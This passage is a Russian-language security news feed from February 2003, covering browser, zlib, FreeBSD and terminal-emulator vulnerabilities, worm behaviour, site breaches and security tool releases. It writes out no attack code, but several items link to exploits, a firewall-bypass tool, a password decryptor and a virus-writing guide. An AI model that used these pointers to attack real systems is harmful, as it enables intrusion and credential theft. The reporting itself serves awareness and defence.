Как сообщает Jakob Balle из Secunia, обнаружена уязвимость в популярном броузере Opera. Уязвимость, как указывается существует в методе, который применяется в Opera для генерации временной страницы, показывающей перенаправление при деактивации опции "Automatic redirection". При сохранении подобной временной страницы Opera не удаляет символы в запросе, что позволяет внедрить произвольный код скрипта. Эта страница имеет те же полномочия, что и домен, от имени которого производится перенаправление. Это позволяет злоумышленнику похитить куки, подменить сессию. Уязвимость была проверена на Opera до версии 7.02 на платформе Windows и в версии 6.0 на Linux. Рекомендуется обновиться до версии 7.02 (платформа Windows). Также в качестве временной меры рекомендуется включить опцию "Automatic redirection". Пример эксплоита - http://www.secunia.com/secunia_research/2003-1/exploit/
28/02/2003 10:29 Патчи по безопасности многих PHP-продуктов.
frog-m@n сообщает о выпуске заплаток, перекрывающие уязвимости многих PHP-продуктов. Список программ довольно обширен, в частности, обновились: SPGpartenaires, WAnewsletter, PEEL, PIMP (Prometheus Internet Mail Program), phpPass, PHPMyPub, phpMyShop, Yabb SE, PHP-Nuke, Myguestbook. Подробности - http://www.phpsecure.org
28/02/2003 09:44 Уязвимость в Darwin Streaming Server и QuickTime Streaming Server.
@stake, Inc. сообщает об обнаружении уязвимости в Darwin Streaming Server и QuickTime Streaming Server. Apple Darwin and QuickTime Streaming Administration Servers применяется в качестве Вэб-ориентированного, предназначенного для администрирования Darwin и QuickTime Streaming серверами. Запускается от имени суперпользователя (root) на порту 1220/tcp. Из-за некорректного программирования CGI-сервисов уязвимость позволяет: удалённо выполнить произвольную команду, расширение привилегий для просмотра листинга директорий, кросс-сайт скриптинг, вычисление полного пути файлов, переполнение буфера. В основном уязвимость связана с компонентой parse_xml.cgi. Рекомендуется обновить ПО для Mac OS X Server версий 10.2, 10.2.1, 10.2.2 и 10.2.3 с сервера Apple. Подробности - http://www.atstake.com/research/advisories/2003/a032403-1.txt
27/02/2003 17:55 U.S. Information Security Law:Protecting Private Sector Systems, and Information Security Professionals and Trade Secrets
Под таким названием появлась 1-ая часть статьи на SecurityFocus, повествующей о законодательной базе США в области информационной безопасности. Ознакомиться - http://www.securityfocus.com/infocus/1669
27/02/2003 17:55 Казахский хакер признан виновным в вымогательстве
Нью-йоркский суд признал виновным в вымогательстве 29-летнего гражданина Казахстана Олега Зезова. Он был арестован два с половиной года назад по обвинению во взломе компьютерной сети компании Bloomberg и попытке вымогательства $200 тыс. у главы компании Майкла Блумберга за информацию о том, как ему и его подельнику удалось проникнуть в базу данных компании. Дело получило широкий резонанс, поскольку за время следствия Майкл Блумберг стал мэром города Нью-Йорка. Подробности - http://www.cnews.ru/newtop/index.shtml?2003/02/27/141336
27/02/2003 14:09 Вышел XFree 4.3.0
Долгожданный релиз XFree 4.3.0. Множество нововведений, поддержка нового оборудования. Полный ChangeLog - http://cvsweb.xfree86.org/cvsweb/~checkout~/xc/RELNOTES?rev=1.17
26/02/2003 22:57 Первый антивирус для Lindows.
Компания Lindows, разработчик одноименной операционной системы, объявила о выпуске первого антивирусного пакета для своей платформы. VirusSafe, а именно такое название получил пакет, фактически представляет собой модифицированную версию ПО Vexira Antivirus for Linux Workstation. Подробности - http://story.news.yahoo.com/news?tmpl=story&u=/pcworld/20030219/tc_pcworld/109428
26/02/2003 20:59 Intel предложила замену BIOS’у
По сообщениям slashzone.ru, немногим менее трех недель назад компания Phoenix Technologies сообщила о разработке специальной технологии «компьютерного бункера» - защищенной области на жестком диске, в которой будут храниться критически важные программы и утилиты для восстановления работоспособности системы. Теперь корпорация Intel предлагает использовать эту защищенную область (программно недоступные сектора жесткого диска) для расположения системы Extensible Firmware Interface (EFI), которая в ближайшем будущем должна полностью вытеснить традиционные BIOS’ы. Как сообщается, EFI будет иметь графический интерфейс (палитра VGA), а при создании системы будет использован обычный язык программирования С. Таким образом, разработчики смогут легко добавлять в EFI дополнительные утилиты и программные средства, например, пакеты для сетевой диагностики, разбиения жесткого диска и так далее. Еще одним преимуществом EFI станет независимость от типа используемой платформы – будь то Itanium, Xscale или Pentium. Конечно, вряд ли EFI вытеснит привычные всем BIOS’ы за несколько месяцев: скорее всего, на это уйдет не один год. Более того, на первых порах BIOS и EFI будут сосуществовать, однако в дальнейшем Intel намерена полностью отказаться от базовой системы ввода/вывода, которая используется производителями вот уже двадцать лет. Источник - http://slashzone.ru/
26/02/2003 20:43 MICROSOFT озверела.
Последние исследования Jupiter Research показали, что в 2003 году американцы получат около 320 миллиардов спамерских посланий. Такая перспектива мало радует несчастных юзеров, потерявших надежду обезопасить свои ящики от почтового мусора. Не сдаются только отчаянные законодатели, зарабатывая себе плюсы в глазах электората. Калифорнийский сенатор Дебра Боуэн вскоре представит на обсуждение законопроект, согласно которому любая отправка несанкционированных электронных посланий будет достаточным поводом для возбуждения уголовного дела. Минимальное наказание, согласно законопроекту, – штраф в $500, сообщает Reuters. "Спам превращает электронную почту в сточную трубу, – говорит госпожа сенатор. – 9 миллиардов долларов, которые американские компании теряют в год из-за спама, – более чем достаточный повод для принятия такого закона". Проблема спама волнует не только обычных пользователей и представляющих их интересы сенаторов, но и крупные интернет-компании. В частности, среди обиженных владельцы бесплатных почтовых сервисов, которые регулярно становятся объектом спамерского внимания. Последней пострадала Microsoft – спамеры атаковали почтовые аккаунты пользователей сервиса Hotmail. Софтверный гигант подал иск против спамеров в федеральный суд в Сан-Хосе. Примечательно то, что иск подан против "привидений". Microsoft судится не с конкретными людьми, а с явлением, запасаясь на будущее законодательной базой в борьбе с конкретными спамерами. Тем самым компания подтверждает свое скептическое отношение к действующим законам по борьбе с этой сетевой заразой. В корпорации считают (небезосновательно, кстати), что настало время использовать свое влияние на рынке для решения проблемы спама. Предложенное Microsoft решение одни считают революционным, а другие бредовым. Суть его в том, чтобы сделать каждое отправленное электронное письмо платным. Тем самым спамеры, рассылающие миллионы писем, потеряют всякие доходы от своего бизнеса. Главная задача – идентифицировать каждого отправителя писем (хотя при ее решении проблема спама отпадет без всяческих инициатив Microsoft). Подробности - http://www.utro.ru/articles/20030221020927128994.shtml
26/02/2003 11:35 Пакет "FreeGSM" - 35 долларов в карман мошеннику.
Как известно, русский человек падок на бесплатное. Как тут не вспомнить душещипательные истории а ля Леня Голубков. Лохотроны всегда были, есть и будут, пока существуют предприимчивые мошенники и их доверчивые клиенты. В последнее время довольно часто в интернете можно встретить предложения за каких-то жалких 35 долларов приобрести волшебную программку, которая открывает перед её владельцами поистине бескрайние возможности. Называется пакет "Free GSM". По словам продавцов программки, принцип работы пакета "FreeGSM" строится на основе изучения принципов ASN-кодов. Программа якобы позволяет перепрограммировать ваш мобильный телефон таким образом, что звонить можно куда угодно и сколько угодно. И всё совершенно забесплатно. Вы тратите полчаса-час на перепрограммирование телефона и в результате получаете анонимный, не пеленгуемый телефон с возможностью неограниченных звонков, SMS-сообщений и поддержкой роуминга. Призывая читателей стать счастливым обладателем пакета "Free GSM", его автор рассказывает правдиво звучащую историю о том, как он взламывал GSM: "Если вы знакомы со стандартом GSM, то наверняка знаете, что пароли ASN постоянно меняются, сохраняясь на сервере и SIM-карте вашего телефона. Теоретически, создать клон такого телефона можно, но у этой технологии слишком много недостатков: дорого, работать в конкретный момент может только один телефон, нельзя принимать входящие звонки, могут запеленговать. Я же реализовал другой подход, основанный на самом принципе смены ASN-пароля на сервере. В этом случае появляется возможность получать с сервера новый ASN-пароль, не стирая старый. Получается, что ASN-код будет продолжать регистрировать вас в сети, а старый пароль как бы подвисает, делая вас невидимым в сети, но при этом позволяя звонить. При этом на сервере даже не записывается ваш номер телефона и телефон получается анонимным." Всё бы хорошо, только волшебная программа не работает. Заплатив 35 долларов, вы остаетесь и без денег и без бесплатных звонков. Что, конечно, обидно. Можно лишь посоветовать быть бдительнее и никогда не забывать золотого принципа: бесплатный сыр бывает только в мышеловке. Источник - http://www.viruslist.ru
26/02/2003 11:02 Червь Lovgate ворует данные с зараженного компьютера.
В сети обнаружен новый вирус-червь Lovgate, который также известен как Supnot. Червь распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам, и по локальной сети. Также устанавливает в систему программу-шпиона. В настоящий момент известно несколько версий червя, которые отличиются друг от друга незначительными деталями. Lovgate является приложением Windows (PE EXE-файл), написан на Microsoft Visual C++, упакован утилитой AsPack, имеет размер: "Supnot.a": около 85K, "Supnot.b": около 77K, "Supnot.c": около 79K. В письмах червь активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). При заражении сети червь просто копирует себя в каталоги сети, а также пытается автоматически запустить свою копию (под WinNT). При запуске зараженного файла червь инсталлирует себя в систему и запускает процедуры своего распространения.Зараженные письма рассылаются двумя способами: 1. Червь ищет "*.ht*"-файлы в текущем каталоге, в каталоге Windows и в каталоге "My Documents", выделяет из них строки, являющиеся адресами электронной почты и рассылает по этим адресами зараженные письма. При отсылке писем червь использует прямое подключение к SMTP-серверу (указанному в настройках системы или подключается к серверу smtp.163.com). 2. Червь использует функции Windows MAPI и "отвечает" на письма, обнаруженные в почтовом ящике. Червь запускает бекдор-процедуру, используя метод IPC (Interprocess Communication) - червь открывает сетевое соединение (pipe) и запускает на зараженной машине командный процессор CMD.EXE (под WinNT) или COMMAND.COM (под Win9x). В результате удаленный "хозяин" червя получает доступ к ресурсам зараженного компьютера. Источник - http://www.kaspersky.ru
26/02/2003 10:38 Новый червь Tanked ползет по сети Kazaa.
Недавно обнаруженный новый вирус-червь Tanked распространяется по "peer-to-peer" сети обмена файлами Kazaa. Червь Содержит достаточно мощную "Backdoor"-процедуру, которая управляется "хозяином" через подключение к IRC-каналам. Tanked представляет собой приложениее Windows (PE EXE-файл), имеет размер около 100K, написан на Microsoft Visual C++. Упакован пакером UPX и зашифрован утилитой "Krypton". При запуске червь инсталлирует себя в систему: копирует себя в системный каталог Windows и регистрирует этот файл в ключах авто-запуска системного реестра. Источник - http://www.viruslist.com
26/02/2003 05:46 Хакеры напали на "Кавказский узел".
19 февраля информационно-аналитический сайт "Кавказский узел" (http://kavkaz.memo.ru) подвергся хакерской атаке. Как утверждается в специальном обращении сайта к читателям, была полностью уничтожена база данных сетевого проекта. К 19 февраля на "Кавказском узле" было опубликовано более 26 тысяч материалов, посвященных событиям в Кавказском регионе. На сегодняшний день специалистам уже удалось восстановить большую часть информации, но публикации за период с 25 января по 19 февраля потеряны. Восстановление уничтоженных данных продолжается. Сайт не будет останавливать своей работы. Установить личность злоумышленников пока не удалось. Но в редакции "Кавказского узла" не сомневаются, что атаку можно считать целенаправленной. Информационно-аналитический сайт "Кавказский узел" уделяет много внимания правовой защите и представляет различные точки зрения на кавказские события. В ленте новостей сайта ежедневно публикуется от 70 до 100 материалов. Сайт был запущен как партнерский проект общества "Мемориал", программы "Гражданское общество" Института "Открытое общество", Института прав человека и информационно-исследовательского центра "Панорама". Источник - http://www.lenta.ru
25/02/2003 17:19 Уязвимости во многих программах эмуляции терминала.
Известный исследователь компьютерной безопаности H D Moore своместно с членами своей команды Digital Defense Operations Team сообщает об окончании исследования, посвящённого исследованию проблем безопасности многих программных продуктов, эмулирующих виртуальные терминалы. Подобные программы получили широкое распространение в мире открытых систем (UNIX-OC). К ним относятся: xterm, aterm, rxvt, Eterm, konsole, putty, SecureCRT, gnome-terminal, hanterm-xf (приведены названия только тех программ, которые были исследованы). Отчёт о проделанной работе довольно объёмен. Если попытаться его изложить вкратце, то было замечено, что используя различную последовательность т.н. Эскейп-последовательностей можно проделывать довольно интересные "фокусы" посредством этих программ эмуляции. Последствия их различны и зависят от конкретного приложения, однако в итоге сводятся либо в забивании терминала символьным мусором, либо (в некоторых случаях) в получении полного контроля над машиной. Эскейп-последовательности предсталяют собой последовательность символов, начинающихся с ASCII-символа ESC (код 0x1B) и следующим за ним различных аргументов. Исторически, подобные последовательности применялись для управления неинтеллектуальными (dumb) терминалами для формирования команд на перевод строки, отступ, табуляция и т.д. В настоящее время широко применяются во многих ОС для формирования различных аттрибутов текста, формирования приглашения командной строки и т.д. В различных реализациях виртуальных терминалов были замечены следующие опасные возможности: удалённая вставка эскейп-последовательностей в лог-файлы (при ведении логов на удалённой машине) и последующем просмотре может привести к засорению терминала и, в некоторых случаях, выполнения произвольного кода; возможность снятия дампа экрана; использования возможности изменения заголовка окна виртуального терминала для обмана пользователя; возможность выполнения произвольных команд в некоторых реализациях при помощи передачи эскейп-последовательностей на терминал администратора. О наличии подобных уязвимостей было сообщено CVE (Common Vulnerabilities and Exposures project), которым и были назначены соотвествующие коды уязвимостей: CAN-2003-0020...0024, 0063-0070, 0078-0079. В конце исследования приводится примерный сценарий использования описанных уязвимостей. Подробности - http://www.digitaldefense.net/labs/whitepapers.html
25/02/2003 16:01 Новая версия программы аудита и восстановления паролей Windows NT/2000/XP.
Как сообщает bugtraq.ru, выпущена новая версия LC+4, программы аудита и восстановления паролей Windows NT/2000/XP. Основные изменения: добавлена возможность создания дампа паролей методом pwdump2 с поддержкой Active Directory; добавлена возможность создания дампа паролей методом pwdump3/pwdump3e; стал возможен импорт файлов сеансов LC3/LC4; появилась возможность восстановления паролей по NT-хэшам и NT-запросам/ответам; добавлены параметры атаки по словарю, гибридной атаки и атаки последовательным перебором; доработано разбиение на части последовательного перебора; добавлена возможность экспорта результатов аудита в текстовый файл и найденных паролей в файл словаря; увеличена скорость восстановления паролей; изменен интерфейс программы. Также на сайте проекта заявлено об обновлении утилиты SID&User, предназначенной для для получения SID и имен учетных записей Windows NT/2000/XP. Сайт проекта - http://lcp.nm.ru/
25/02/2003 13:56 Серия курсов лекций от ООО "Фракталь-СБ".
В банке данных "Системы безопасности" под редакцией ООО "Фракталь-СБ" начинается серия курсов лекций, посвященных нормативной документации, регламентирующей создание технических систем безопасности. Открыт первый курс лекций: Электромагнитная совместимость в системах безопасности. Курс читает представитель Госстандарта РФ. Подробности - http://www.f-sb.ru/cgi-bin/course_view.cgi
25/02/2003 11:59 "Безопасность Windows 2000 Server" от Microsoft.
Microsoft анонсировала выход новой документации, посвящённой безопасности Windows 2000 Server. Как пишется в анонсе, выпущенном от имени Microsoft Майклом Ховардом, это первый документ из серии планируемых в этом году описаний, посвящённым проблемам безопасности выпускаемых ОС. Состоит из 11 глав. Также на самом сайте этот документ доступен в формате PDF, также доступны примеры и сценарии, упоминаемые в руководстве. Ссылка - http://www.microsoft.com/technet/treeview/default.asp?... PDF и примеры скриптов - http://www.microsoft.com/downloads/...
25/02/2003 11:44 Выход Nessus 2.0.
Renaud Deraison из Tenable Network Security сообщил о выходе версии 2.0 популярного сканера безопасности Nessus. Выпускается на условиях GPL и доступен в UNIX-подобных ОС ( Linux/FreeBSD/OpenBSD/Solaris/IRIX/MacOSX ) и способен проверять на уязвимость широкий диапазон сетевых хостов - от HP-принтеров до Windows XP. Является мощнейшим инструментом в руках системных администраторов для проверки защищённости подопечной сети. Улучшения: переписанный с нуля интерпретатор встроенного языка NASL, а также расширения самого языка; более интеллектуальный планировщик подключаемых модулей; уменьшение объема используемой памяти; обновленный сканер портов, поддержка уязвимостей BUGTRAQ (по их ID); улучшение в выводе результатов в формате HTML. Подробнее - http://www.nessus.org/features.html
25/02/2003 11:09 Переполнение буфера в zlib.
Richard Kettlewell сообщает о возможности перезапуска (переполнения) буфера в библиотеке zlib, импользуемой многими программными продуктами. Эта библиотека обеспечивает работу с архивированием/разахированием данных, включая проверку целостности этих данных. В версии 1.1.4 эта библиотека использует функцию gzprintf() (вместо вызова стандартной fprintf()), при передаче которой в качестве аргумента значения, превышающего Z_PRINTF_BUFSIZE (=4096 байт по умолчанию), происходит переполнение буфера. В качестве метода применения подобной уязвимости автор предлагает рассмотреть выдачу длинного запроса HELO при обмене с MTA. Cамим автором выпущен эксплоит crashzlib.c, также эксплоит выпущен нашим соотечественником CrZ (Crazy Einstein) из lbyte (lbyte.void.ru) - zlib.c. Источник - http://www.securityfocus.com
25/02/2003 10:35 Cайт Митника опять поимели.
Сайт Кевина Митника (ака www.defensivethinking.com) в очередной раз задефейсили. На сей раз дефейс был осуществлён по политическим мотивам (вернее, на нём были выложены политические лозунги). Хакер DkD[|| после получения доступа к неверно сконфигурированному сайту выложил на нём лозунги с осуждением войны в Палестине Ираке и Чечне с призывом к Шарону/Бушу/Путину остановить уничтожение этих народов (довольно странный способ политически самовыразиться, надо признать). Кроме того, на сайте (по традиции) поздравляют с выходом Кевина в Интернет и призывают администратора НАКОНЕЦ-ТО залатать дыру в IIS (суть которой - в неверных полномочиях на корневую директорию Вэб-сервера - мы писали об этом в предыдущих новостях). Но, как указывает Zone-H, вместо этого администратор просто запрещает доступ с IP-адресов зеркал Zone-H и с IP хакера, выполнившего дефейс. Также ребята из Zone-H пишут, что в онлайновой беседе с DkD[||, он сказал, что не имел никаких личных мотивов для дефейса сайта, а просто вот таким вот оригинальным способом решил распространить свои политические взгляды. Зеркало дефейса доступно по ссылке, приведённой ниже. Оригинальное, надо признать, у ребят из Defensive Thinking представление об оборонительном мышлении. :) Ссылка - http://www.zone-h.org/defaced/2003/02/23/www.defensivethinking.com(1)/
25/02/2003 10:26 Linux 2.5.63
Вышла новая версия в нестабильной ветви ядра. На этот раз - множественные обновления в USB, коде ipv6, oss и многое другое. Скачать - http://www.kernel.org/
25/02/2003 10:10 Hackers' School не в состоянии защитить самих себя.
Сайт Гражданской Школы Хэкеров (http://hscool.net), организации, позиционирующей себя как "hackers' school", опять взломан. Это уже второй взлом сайта за текущий год. На этот раз "хэкерами" заинтересовалась хакерская группа URHA (Ural Russian Hackers Association). После предыдущего взлома сайт менял хостинг, но это не очень-то помогло. Характерно, что в обоих случаях хостинг принадлежал ученикам Школы. Источник - http://www.securitylab.ru
25/02/2003 10:03 Анализ защищённости компьютерных сетей организаций.
Компания Positive Technologies (известная также разработкой сканера XSpider)в рамках акции по бесплатному аудиту безопасности компьютерных сетей организаций в декабре 2002г. - январе 2003г провела исследование защищённости сетей различных организаций, добровольно зарегистрировавшихся на сайте компании. В общей сложности было проверено 367 IP-адресов в 197 организациях. В ходе исследования ставилась задача оценить степень защищенности компьютерных сетей организаций от возможных внешних сетевых атак. Другими словами, оценивалась "хакероустойчивость" корпоративных сетей, имеющих выход в Интернет. Проблемы внутренней информационной безопасности компаний в настоящем обзоре не рассматриваются. Вся основная информация представлена в виде диаграмм с комментариями от Positive Technologies. Честно говоря, в отдельных случаях оценка защищённости вызывает некоторые сомнения - например, как указал один из участников обсуждения на сайте securitylab.ru, у него обнаружили уязвимость BIND только на основании версии BIND, однако при этом не уитывается тот факт, что многие администраторы могут не прибегать к обновлениям версии ПО, а патчить уже существующие. Впрочем, в любом случае будет небезинтересно ознакомиться с результатами исследования. Подробности - http://www.ptsecurity.ru/analisis01.asp
24/02/2003 19:09 Документ о разработке ассемблерных компонент в Win32.
Исследовательская группа LSD (Last Stage of Delirium) из Познани (Польша) сообщила о выпуске документа, посвящённого описанию процесса разработки ассемблерных компонент (ассемблерных кодов) в Win32 средах. Презентация документа состоялась 27 ноября 2002 на конференции Hivercon 2002 в Дублине. В представленной ниже ссылке доступен как сам документ в формате PDF, так и исходные коды программ. Будет представлять большой интерес для программистов в Windows-средах, сталкивающихся с необходимостью включения в программы ассемблерных кодов. Подобный документ для UNIX-ОС был опубликован ранее и также доуступен в PDF-формате. Ссылка - http://lsd-pl.net/
24/02/2003 18:33 Уязвимость во FreeBSD.
Как сообщает команда разработчиков ОС FreeBSD в бюллетене по безопасности FreeBSD-SA-03:03.syncookies, обнаружена уязвимость в реализации TCP/IP-стека FreeBSD, а конкретно - в алгоритме назначения значения SYN cookies. Технология SYN cookies предназначена для предотвращения атаки типа "SYN flood" (наводнение ложными SYN-пакетами, преназначенными для инициализации первой фазы "тройного рукопожатия" (tree-way handshaking) сеанса TCP). Представляет из себя генерацию случайного начального номера пакета TCP (он же ISN), для затруднения подмены одного из инициаторов соединения, либо внедрения в уже существующее соединение. В FreeBSD подобный номер фомируется на основе использования идентификатора сетевой карты (MAC-адрес) в качестве ключа. Однако было замечено. что ключ для формирования случайного номера содержит только 32 бита, что является недостаточнм с точки зрения криптостойкости алгоритма и делает возможным проведение атаки путём подбора ISN (brute force attack). В частности, указывается, что происходит полный перебор всех возможных комбинаций в течении 4-х секунд. Возможность сконструировать правильный ISN пакета приводит к возможности посылки пакета с поддельным IP-адресом (spoofing) с большой вероятностью того, что он не будт отвергнут сетевым стеком - также возникает возможность обхода механизмов защиты, основанных на фильтрации пакетов на основе адреса (IP) источника. В качестве временной меры предлагются 2 шага. Первый - отключение syncookies при помощи команды - sysctl net.inet.tcp.syncookies=0. Второй - отключение syncookies в момент загрузки выставкой в sysctl.conf: net.inet.tcp.syncookies=0. Рекомендуется обновить версии ОС на версии, обновлённые после выпуска бюллетеня (24 февраля). Возможен также вариант применения патча для систем 4.6, 4.7 и 5.0, после чего необходимо пересобрать ядро. Патч - ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:03
24/02/2003 17:43 Новая версия Miranda ICQ Password Decryptor v1.1
Новое в этой версии: + Пароль правильно определяется для всех версий баз + Автобнаружение баз Миранды и автоматическая расшифровка паролей Скачать: http://www.uinc.ru/scripts/load.cgi?files/neox/MPD.zip
24/02/2003 13:23 Изменился формат IMEI.
Как сообщается на сайте mobile-review.com, c начала этого года установлена новая процедура назначения кода телефона IMEI (международный идентификатор мобильных устройств). Изменения коснулись части Final Assembly Code (FAC - код страны окончательной сборки), он установлен на 00 на период времени 01/01/2003 до 31/03/2004. Формат IMEI следующий: NNXXXX YY ZZZZZZ A, где NNXXXX - TAC (Type Approval Code - код модели телефона), а YY - Final Assembly Code. Упразднение FAC дает возможность производителям перейти на восьмизначный код модели телефона (TAC). Эта процедура регулируется организацией BABT (Великобритания), которая распределяет коды IMEI среди производителей терминалов GSM 900/GSM 1800. IMEI можно посмотреть, набрав на клавиатуре телефона *#06# Источник - http://mobile-review.com
24/02/2003 12:27 Архив броузеров в Интернете.
Благодаря anfrax.ru обнаружили довольно любопытный сайт в Интернете, на котором собран крупнейший архив взевозможных броузеров, применявшихся в разное время для "прогулок" по всемирной паутине. Как следует из описания, работа по подбору архива была начата одним из членов evolt.org Адрианом Роселли в 1999 году. В настойщий момент в архиве 115 (!) броузеров. Честно говоря, о многих из них я (ньюсмейкер) даже не слышал. Сайт проекта - http://browsers.evolt.org/
24/02/2003 11:56 Управление доступом - теперь и в отдельных приложениях.
Как сообщает bugtraq.ru, MS анонсировала свои планы по выпуску в качестве плагина к Windows Server 2003 службы Windows Rights Management Services (RMS). RMS основана на очередном расширении XML - Extensible Rights Markup Language (XrML) и позволяет устанавливать уровни доступа к отдельным операциям над документами, электронными письмами и т.п. - печати, копированию и т.д. Первыми приложениями, использующими RMS, станут, естественно, компоненты Office 2003. Как это хозяйство будет сочетаться со старым софтом, пока не совсем понятно. Кроме того, поскольку в описании покуда нет ни слова о шифровании, похоже, что вся эта защита легко снимается переносом в другую систему. Подробности - http://www.computerworld.com/securitytopics/security/story/0,10801,78732,00.html?f=x73
24/02/2003 11:41 LiveJournal атаковали хакеры.
Многие пользователи сервиса LiveJournal обратили внимание на то, что в последние два дня к нему довольно часто невозможно было достучаться. Объяснения случившемуся обнаружились в дневнике создателя сервиса — Брэда Фицпатрика (Brad Fitzpatrick). "Последние два дня LiveJournal постоянно атаковали... худшая DDoS-атака, какую мы когда либо переживали (а их было много). Много нервотрёпки. Мало сна. Немеряное количество кофе. Нет доступа для большей части Интернета в течение 27 часов. Но... многие оказали нам неоценимую помощь (особенно один парень, которому я теперь должен много пива), так что теперь эта атака нам нипочём. Благодаря атаке удалось отыскать несколько "узких мест", которые оказалось легко заделать, кроме того, пока сервис был недоступен, я успел поработать над вещами, которыми давно собирался заняться. Конечный результат: всё теперь работает быстрее и эффективнее, чем когда-либо, даже при том, что атака продолжается. Спасибо тебе, хакерёнок. Благодаря твоим стараниям сайт стал только крепче. Ну а теперь можешь успокоиться. Или — давай, продолжай атаковать и трепаться со своими жертвами, пока кибер-подразделения ФБР с нашей помощью отслеживают тебя". Источник - http://www.securitylab.ru
24/02/2003 10:22 Приз за перенос Linux на Xbox может достаться Microsoft.
Ранее сообщалось о проекте Xbox Linux, основной задачей которого является перенос ОС Linux на игровую приставку Microsoft Xbox. Как стало известно в начале этого года, организатором и спонсором проекта является Майкл Робертсон - основатель сайта MP3.com компании Lindows.com - поставщика ограниченно совместимого с Windows дистрибутива ОС Linux. Проект Xbox Linux состоит из двух частей: переноса Linux на Xbox с применением любых дополнительных средств и аналогичного переноса, выполненного без внесения изменений в аппаратную часть приставки. Участники проекта, первыми выполнившие один из этих этапов, могут претендовать на приз в размере до 100 тысяч долларов США. Первый этап проекта давно завершен: перенос Linux на Xbox с применением мод-чипов оказался не слишком сложной задачей. Мод-чипы позволяют обойти встроенную в приставки аппаратную защиту, которая обеспечивает запуск на Xbox только сертифицированных Microsoft приложений. Обойти эту защиту без применения мод-чипов оказалось чересчур сложной задачей. Поэтому вдохновители проекта Xbox Linux направили открытое письмо непосредственно в Microsoft. В нем энтузиасты переноса открытой ОС на игровую приставку призывают Microsoft официально сертифицировать Xbox Linux как приложение для этой игровой приставки. В письме отмечается, что участники Xbox Linux не смогут заплатить больших денег за прохождение сертификации, поскольку проект основан на лицензии GPL. Однако Microsoft может в установленном порядке представить на конкурс сертифицированную версию Xbox Linux и получить 100 тысяч долларов призовых. В Microsoft на данное предложение пока никак не отреагировали. Источник - http://xbox-linux.sourceforge.net/
23/02/2003 12:28 Документ по написанию вирусов в Linux.
Опубликован довольно любопытный документ под названием "The ELF Virus Writing HOWTO". Автором является Alexander Bartolich. Посвящён, как следует из названия, описанию процесса создания файлов, инфицирующих бинарники ELF (формат пришёл на смену старому формату a.out). Помимо исходных текстов также приведены различные методики определения подобных вредоносных програм в среде Linux. Ссылка - http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html
23/02/2003 12:16 Уязвимость в slocate
Пакет slocate [secure locate], входящий в дистрибутив Debian GNU/Linux 3.0, подвержен переполнению буфера, благодаря чему существует возможность выполнения произвольного кода с правами суперпользователя [root]. Источник - http://lwn.net/Articles/23459/ Updates - http://security.debian.org/pool/updates/main/s/slocate/slocate_2.6.orig.tar.gz
23/02/2003 12:03 Возможность обхода персональных файрволлов.
В BUGTRAQ появилось письмо от Oliver Lavery из Канады, в котором утверждается, что существует возможность обхода правил персональных файрволлов. Автором был написан код, который позволяет внедрять код прямо в запущенный процесс без использования сторонних DLL и других библиотек. Предложенные автором код как бы внедряется в установленное при помощи IE соединение на уровне сокета и активизирует сетевую детельность, абсолютно невидимую для "датчиков" большинства современных персональных файрволлов. Как утверждает автор, работа кода была проверена в файрволлах: ZoneAlarm Pro 3.5, Zero-Knowledge Freedom Firewall, Look'n'Stop 2.04, Sygate Personal Firewall PRO, Norton Personal Firewall 2003. Проверялось на платформе Windows XP Professional SP1, однако должно работать на всех NT-ядрах. Подробности и исходник - http://archives.neohapsis.com/archives/vuln-dev/2003-q1/0090.html Бинарник - http://www3.sympatico.ca/oliver.lavery/za-hole.zip
23/02/2003 11:49 В Росии киберпреступность выросла в 2002 году в 3,5 раза.
Сегодня борьбой с преступлениями в отрасли компьютерных технологий занимается Управление "К" МВД РФ. Специалисты отмечают, что рост числа таких правонарушений идет не менее быстрыми темпами, чем компьютеризация в России. Взломами занимаются представители самых различных возрастных категорий и социальных слоев населения. Профессиональными хакерами можно назвать только небольшой процент преступников, - уровень компьютерной грамотности большинства взломщиков оставляет желать лучшего. Но и его оказывается достаточно для того, чтобы завладеть конфиденциальной информацией некоторых беспечных пользователей. Преступников не пугает и тот факт, что по ст. 272 УК РФ им "светит" от шести месяцев до пяти лет лишения свободы. В интервью "АиФ" руководитель пресс-службы Управления "К" МВД РФ Анатолий Платонов отметил, что быстрая поступь компьютеризации в России вызывает такой же рост числа компьютерных преступлений. По данным Управления "К", в прошлом году таких правонарушений было совершено 3,5 тысячи, что означает рост в 3,5 раза по сравнению с 2001 годом. "И хотя преступники ежедневно "ломают" до 10 компьютеров, мы найдем любого. Дело только во времени", - заметил Анатолий Платонов. Источник - http://www.runet.ru
23/02/2003 11:14 Дистрибутив ALT Linux «Утёс-К».
Московская фирма ALT Linux объявила о начале продаж ЗИС (защищённая интегрированная система) «Утёс-К» - универсального дистрибутива Linux, пригодного для использования как в качестве сервера так и рабочей станции. Защищённая интегрированная система обработки конфиденциальной информации «Утёс-К» является универсальным дистрибутивом Linux, содержащим более 2500 пакетов программ и подробную документацию. Дистрибутив содержит всё необходимое для организации широкого спектра решений, включая установку серверов, офисных рабочих станций и систем для разработчиков программного обеспечения. Базой для «Утёс-К» послужил дистрибутив ALT Linux Master 2.0 - надёжное и качественное решение разработки ALT Linux Team. Система сертифицирована Гостехкомиссией по 5 классу СВТ защиты конфиденциальной информации, 4 уровню контроля отсутствия недекларированных возможностей - сертификат N685. Подробности - http://www.altlinux.ru/index.php?module=utes
23/02/2003 11:02 План выхода FreeBSD 5.x.
Опубликован развернутый план выпуска стабильных выпусков FreeBSD 5.x Согласно оптимистичной части плана 5.1-RELEASE выйдет второго июня, а 5.2-RELEASE 29 сентября. Подробнее - http://www.bsdforums.org/forums/showthread.php?threadid=6892
23/02/2003 10:28 Открыта новая рассылка "Linux Info".
Тот же LinuxRuNet (lrn.ru) сообщает об открытии этой командой на subscribe.ru новой рассылки "Linux Info". Рассылка включает в себя полезную информацию для начинающих и опытных пользователей. Мы рассматриваем свободные ОС (Linux, BSD и т.п.) с точки зрения обычного пользователя. В рассылке затрагиваются такие темы, как работа с мультимедией, графическими средами, полезными программами и т.д. В каждом выпуске можно найти самые интересные новости, полезные советы, дистрибутивы и книги, посвящённые Linux. Подписаться - http://subscribe.ru/catalog/comp.soft.linux.info
23/02/2003 10:13 Билль Олийника, версия 10.
